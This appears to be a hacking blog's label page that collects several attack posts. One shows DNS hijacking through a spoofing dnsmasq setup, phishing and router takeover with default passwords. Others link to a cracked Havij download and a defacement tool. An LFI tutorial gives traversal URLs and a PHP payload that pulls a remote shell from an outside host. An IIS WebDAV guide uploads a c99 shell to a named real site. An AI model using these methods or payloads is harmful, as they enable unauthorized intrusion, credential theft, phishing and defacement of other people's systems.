Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts
DNS Hijacking Method

DNS Hijacking Method

22:11 2 Comments


This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.


To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.


Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof


The format for this is address=/HOST/IP


So for example;


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that


But how do you get a victim? Well this is where my project, the IP Experiment could come in handy


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.


Read More:

http://ansaritricks.blogspot.com

Havij 1.17 Final Free Download With Patch - ComeForHack

11:44 10 Comments
Screen Shot:



                                                             Version: 1.17 (Pro)
                                                              File Size: 6.58 MB
                                                              File Type: .RAR

RAR Password: asimaliansari

Havij 1.17 Pro Cracked Download Link Is Here:



Deface Creator Free Download

11:40 2 Comments
Deface Page Creator Free For Hackers:


Screen Shots:

   

Download Link Here:

How To Do LFi? Easy Steps For Hack With LFi

11:31 4 Comments


[MethoD 1]


NOTE: You will need FireFox and its addon Tamper Data to do this method!


LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
In this method we are going to upload a shell by accessing the proc/self/environ.


Now we have our page


http://www.target.com/index.php?include=register.php


And now we are going to do this:

http://www.target.com/index.php?include=../




If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:

http://www.target.com/index.php?include=../etc/passwd





And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:

http://www.target.com/index.php?include=../etc/passwdhttp://www.target.com/index.php?include=../../etc/passwdhttp://www.target.com/index.php?include=../../../etc/passwd




And so on. Now let's say we got to this URL

http://www.target.com/index.php?include=../../../etc/passwd


And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:


http://www.target.com/index.php?include=../../../proc/self/environ




If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.


Now simply access your shell by going to

http://www.taget.com/shell.php




And rape the server.


Now LFI method 2


NOTE: This only works on apache servers!


Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log


If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).


Now when you have found the file, open up cmd and type in


telnet www.tagrget.com 80


When you are inside the telnet, you copy the following code(you use your own shell url ofc)


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).


Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:


http://www.taget.com/shell.php


Lecture by ASim ALi AnSaRi

IIS Hacking For Windows XP, Windows 7 and Vista

11:29 2 Comments

In IIS Exploit we can upload shells, Defaced page or anything you like on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.

STEP 1: Click on Start button and open "RUN".



STEP 2: Now Type  this in RUN


%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".


STEP 5: Now Click on "Finish"


STEP 6: Now the folder will appear. You can open it and put any deface page or anything.


STEP 7: I put  text file in that folder. Named "c99.php" (you can put a txt or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.


Now to view the uploaded site i will go to "http://autoqingdao.com/c99.php"
In your case it will be " www.[sitename].com/[file name that you uploaded] "

_____________________________________________________________________________

If you use Windows Vista or Windows 7, your steps are given below:
  1. Go to Start > Computer.
  2. On Computer homepage, find a option Map Network Drive and make a click.
  3. Map Network Drive Dialog appears. Click “Connect to a Web site that you can use to store your documents and Pictures“.
  4. When ‘Add Network Location’ Wizard appears on your screen, click Next.
  5. Select “Choose a custom network location” and click Next.
  6. Type the web folder address (i.e the vulnerable site you want to attack).

    7.  Enter a name to identify your web folder.
    8.  Check on “Open this network location when I click finish“.
    9.  Click Finish. Now you can insert your deface page.

Enjoy Hacking

For More:
http://ansaritricks.blogspot.com